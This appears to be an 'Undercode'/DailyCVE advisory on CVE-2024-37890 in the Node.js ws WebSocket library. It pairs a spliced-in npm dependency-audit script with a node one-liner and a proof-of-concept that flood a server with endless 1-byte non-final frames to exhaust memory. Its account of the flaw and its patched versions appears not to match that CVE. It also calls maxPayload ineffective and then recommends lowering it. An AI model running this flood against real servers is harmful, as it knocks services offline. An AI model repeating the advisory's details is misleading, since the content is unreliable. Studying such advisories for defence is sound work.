Intro
CVE-2024-37890 is a memory exhaustion vulnerability in the `ws` WebSocket library for Node.js. The flaw resides in how the library handles fragmented WebSocket messages. Under the WebSocket protocol (RFC 6455), a message can be split into multiple fragments, each delivered in a separate frame. The `ws` library reassembles these fragments into a complete message before processing. However, prior to the patched versions, the library did not impose a limit on the number of fragments or control frames that could be queued while waiting for the final fragment.
An attacker can exploit this by sending a continuous stream of tiny fragments – each as a separate WebSocket frame with the `FIN` bit set to `false` – without ever sending the final fragment. For each fragment received, the library allocates a structure to hold the fragment’s data and bookkeeping information. Even though the total payload size per fragment can be as small as 1 byte, the per‑fragment overhead (including wrappers, buffers, and internal state) can be several hundred bytes. By sending a high volume of such fragments (e.g., tens of thousands per second) with modest network bandwidth, the attacker forces the remote peer to allocate an ever‑growing set of these wrappers.
Because the library does not release these allocations until the final fragment arrives (which never does), memory consumption grows linearly with the number of fragments. The default `maxPayload` option (which limits the total reassembled message size) is ineffective here, as it only checks the accumulated payload length, not the number of fragments or the wrapper overhead. Eventually, the Node.js process exhausts available memory and terminates with an “out of memory” (OOM) error. This is a denial‑of‑service (DoS) vulnerability that requires only a single WebSocket connection and modest traffic to trigger, making it highly dangerous for production servers.
The issue affects all `ws` versions prior to 8.21.0, 7.5.11, 6.2.4, and 5.2.5. The fix introduces a limit on the number of fragments that can be queued, thereby capping the memory overhead.
DailyCVE Form
Platform: Node.js
Version: <8.21.0, <7.5.11, <6.2.4, <5.2.5
Vulnerability: Memory exhaustion (DoS)
Severity: High
Date: 2024-07-30
Prediction: 2024-08-15
What Undercode Say
Check vulnerable version:

```shell
npm list ws
```

Install patched version (8.21.0 for the 8.x line; 7.5.11, 6.2.4 or 5.2.5 for the older lines):

```shell
npm install ws@8.21.0
```

Test for vulnerability (requires Node.js; the template literal is escaped so the shell does not expand the backticks or `${port}`):

```shell
node -e "const { WebSocket, WebSocketServer } = require('ws'); const wss = new WebSocketServer({ port: 0 }, () => { const data = Buffer.alloc(1); const options = { fin: false }; const { port } = wss.address(); const ws = new WebSocket(\`ws://localhost:\${port}\`); ws.on('open', function send() { ws.send(data, options, (err) => { if (err) return; send(); }); }); ws.on('error', console.error); }); wss.on('connection', (ws) => ws.on('error', console.error));"
```
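`npm list ws` shows the installed versions but leaves the comparison against the patched releases to the reader. As an added example (not code from the original post or from the `ws` project), the script below walks the JSON that `npm ls ws --json` prints and flags every copy of `ws`, direct or transitive, that is older than the fixed release for its major line. The `PATCHED` table is taken from the advisory text; the sample dependency tree, the function names and the treatment of majors outside 5 to 8 (older treated as unfixed, newer treated as fixed) are assumptions made here.

```javascript
// Added example: audit an npm dependency tree for ws versions below the
// patched releases named in this advisory. Input is the JSON printed by
// `npm ls ws --json`; the sample tree at the bottom is constructed.

// Patched versions per major line, as stated in the advisory.
const PATCHED = { 5: '5.2.5', 6: '6.2.4', 7: '7.5.11', 8: '8.21.0' };

// Parse "MAJOR.MINOR.PATCH" into numbers (pre-release/build suffixes ignored).
function parseSemver(version) {
  const m = /^(\d+)\.(\d+)\.(\d+)/.exec(version);
  if (!m) throw new Error(`unparseable version: ${version}`);
  return m.slice(1, 4).map(Number);
}

// Standard lexicographic comparison of the three numeric components.
function compareSemver(a, b) {
  const [pa, pb] = [parseSemver(a), parseSemver(b)];
  for (let i = 0; i < 3; i++) {
    if (pa[i] !== pb[i]) return pa[i] < pb[i] ? -1 : 1;
  }
  return 0;
}

// True when the installed ws version predates the fix for its major line.
// Assumption (not from the advisory): majors older than 5 never received a
// fix and count as vulnerable; majors newer than 8 postdate 8.21.0 and are
// treated as fixed.
function isVulnerableWsVersion(version) {
  const [major] = parseSemver(version);
  if (major < 5) return true;
  if (major > 8) return false;
  return compareSemver(version, PATCHED[major]) < 0;
}

// Walk the nested `dependencies` objects of `npm ls ws --json` output and
// return every ws install with its path in the tree and its status.
function auditWsTree(tree) {
  const findings = [];
  const walk = (node, path) => {
    for (const [name, dep] of Object.entries(node.dependencies || {})) {
      const depPath = [...path, `${name}@${dep.version}`];
      if (name === 'ws' && dep.version) {
        findings.push({
          path: depPath.join(' > '),
          version: dep.version,
          vulnerable: isVulnerableWsVersion(dep.version),
        });
      }
      walk(dep, depPath); // ws can also be nested under another package
    }
  };
  walk(tree, []);
  return findings;
}

// Parse raw `npm ls ws --json` output (e.g. read from stdin) and audit it.
function auditFromJson(json) {
  return auditWsTree(JSON.parse(json));
}

// Constructed sample resembling `npm ls ws --json` for an app with a direct,
// unpatched ws dependency and a second, patched copy pulled in transitively.
const SAMPLE_NPM_LS = JSON.stringify({
  name: 'example-app',
  version: '1.0.0',
  dependencies: {
    ws: { version: '8.17.0' },
    'some-realtime-lib': {
      version: '2.3.0',
      dependencies: { ws: { version: '7.5.11' } },
    },
  },
});

for (const f of auditFromJson(SAMPLE_NPM_LS)) {
  console.log(`${f.vulnerable ? 'VULNERABLE' : 'ok        '} ${f.path}`);
}
```

To run it against a real project, replace `SAMPLE_NPM_LS` with the output of `npm ls ws --json` (for example, read from stdin). A copy of `ws` that is deduplicated or otherwise listed without a `version` field is skipped rather than reported, so a clean report is only meaningful when every entry carried a version.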
Exploit
```javascript
// Proof of concept – sends infinite 1‑byte fragments
const { WebSocket, WebSocketServer } = require('ws');

// Server side: accepts the connection and queues incoming fragments
const wss = new WebSocketServer({ port: 8080 });
wss.on('connection', (ws) => {
  console.log('Client connected – vulnerable');
});

// Client side: a single connection that never sends the final fragment
const ws = new WebSocket('ws://localhost:8080');
ws.on('open', () => {
  const fragment = Buffer.alloc(1);
  const options = { fin: false }; // fragment, not final frame
  function sendFragment() {
    ws.send(fragment, options, (err) => {
      if (err) return;
      setImmediate(sendFragment);
    });
  }
  sendFragment();
});
ws.on('error', console.error);
```
Protection
- Upgrade to `ws@8.21.0`, `7.5.11`, `6.2.4`, or `5.2.5` immediately.
- If upgrade is impossible, reduce the `maxPayload` option to a low value (e.g., `maxPayload: 1024`). This does not eliminate the flaw but lowers the maximum memory per fragmented message.
- Use reverse proxies or load balancers that enforce per‑connection memory and fragment limits.
- Monitor memory usage and restart processes periodically as a temporary workaround.
Impact
Successful exploitation causes the Node.js process to consume all available memory (RAM + swap) and crash, leading to denial of service. A single unauthenticated WebSocket connection is sufficient. Attackers require only modest bandwidth (e.g., a few kilobytes per second) to send thousands of fragments. This can take down critical services like real‑time APIs, chat servers, gaming backends, and any application using the `ws` library for WebSocket communication. No data leakage or privilege escalation is involved – purely availability impact.
Sources:
Reported By: github.com

